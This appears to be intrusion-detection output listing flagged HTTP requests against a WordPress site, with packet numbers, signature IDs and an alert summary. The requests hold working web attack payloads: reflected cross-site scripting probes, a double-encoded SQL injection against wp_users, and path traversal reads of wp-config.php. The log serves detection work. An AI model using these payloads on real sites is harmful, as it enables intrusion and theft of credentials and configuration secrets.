Packet [231]	Uri [/web/?rest_route=/wc/store/products/collection-data&calculate_attribute_counts[0][query_type]=or&calculate_attribute_counts[0][taxonomy]=%252522%252529%252520union%252520all%252520select%2525201%25252Cconcat%252528id%25252C0x3a%25252c%252522sqli-test%252522%252529from%252520wp_users%252520where%252520%252549%252544%252520%252549%25254E%252520%2525281%252529%25253B%252500]	Nattacks [4]	Signatures	[2006445]	[2006446]	[2010963]	[2011042]
Packet [232]	Uri [/web/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [236]	Uri [/web/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [238]	Uri [/web/?s=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [239]	Uri [/web/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [243]	Uri [/web/wp-content/plugins/church-admin/includes/validate.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2015496]
Packet [244]	Uri [/web/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [246]	Uri [/web/wp-content/force-download.php?file=../wp-config.php]	Nattacks [2]	Signatures	[41420]	[2016078]
Packet [247]	Uri [/web/listing/?listing_list_view=standard13%22%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [249]	Uri [/web/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [250]	Uri [/web/wp-content/plugins/simpel-reserveren/edit.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [252]	Uri [/web/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2014656]
Packet [254]	Uri [/web/wp-content/plugins/sourceafrica/js/window.php?wpbase=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [255]	Uri [/web/wpdmpro/list-packages/?orderby=title%22%3E%3Cscript%3Ealert(1)%3C/script%3E&order=asc]	Nattacks [1]	Signatures	[2009714]
Packet [256]	Uri [/web/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [257]	Uri [/web/wp-content/plugins/anti-plagiarism/js.php?m=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [262]	Uri [/web/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [263]	Uri [/web/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [264]	Uri [/web/wp-content/plugins/wp-symposium/get_album_item.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [269]	Uri [/web/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [270]	Uri [/web/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [272]	Uri [/web/wp-admin/admin.php?page=ultimate-maps-supsystic&tab=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [273]	Uri [/web/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8]	Nattacks [1]	Signatures	[2009714]
Packet [276]	Uri [/web/?rsd=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [277]	Uri [/web/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [279]	Uri [/web/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php]	Nattacks [1]	Signatures	[41421]
Packet [280]	Uri [/web/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&]	Nattacks [1]	Signatures	[2009714]
Packet [281]	Uri [/web/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [282]	Uri [/web/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [284]	Uri [/web/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [285]	Uri [/web/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [287]	Uri [/web/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [295]	Uri [/web/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2015536]
Packet [297]	Uri [/web/wp-content/plugins/raygun4wp/sendtesterror.php?backurl=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [298]	Uri [/web/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [299]	Uri [/web/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [303]	Uri [/web/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//]	Nattacks [1]	Signatures	[2009715]
Packet [304]	Uri [/web/wp-content/plugins/e-search/tmpl/title_az.php?title_az=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [307]	Uri [/web/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [309]	Uri [/web/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [314]	Uri [/web/wp-content/plugins/import-legacy-media/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [315]	Uri [/web/wp-content/plugins/wpsolr-search-engine/classes/extensions/managed-solr-servers/templates/template-my-accounts.php?page=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [317]	Uri [/web/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [318]	Uri [/web/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [319]	Uri [/web/wp-content/plugins/hdw-tube/playlist.php?playlist=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [320]	Uri [/web/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [322]	Uri [/web/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8]	Nattacks [1]	Signatures	[2009714]
Packet [323]	Uri [/web/wp-admin/admin-ajax.php?action=duplicator_download&file=%2F..%2Fwp-config.php]	Nattacks [1]	Signatures	[41421]
Packet [324]	Uri [/web/car1/estimateresult/result?s=&serviceestimatekey=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [325]	Uri [/web/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [2]	Signatures	[2009714]	[2015536]
Packet [327]	Uri [/web/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [329]	Uri [/web/wp-content/plugins/parsi-font/css.php?size=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [330]	Uri [/web/wp-admin/admin-ajax.php?action=bwg_frontend_data&shortcode_id=1"%20onmouseover=alert(document.domain)//]	Nattacks [1]	Signatures	[2009715]
Packet [332]	Uri [/web/wp-content/plugins/custom-tables/iframe.php?s=1&key=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [334]	Uri [/web/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php]	Nattacks [1]	Signatures	[41420]
Packet [337]	Uri [/web/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
Packet [338]	Uri [/web/wp-content/plugins/whizz/plugins/delete-plugin.php?plugin=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E]	Nattacks [1]	Signatures	[2009714]
# N. packets [342], [191] with alerts, N. Alerts [222]
# Execution time: 0.033987 s
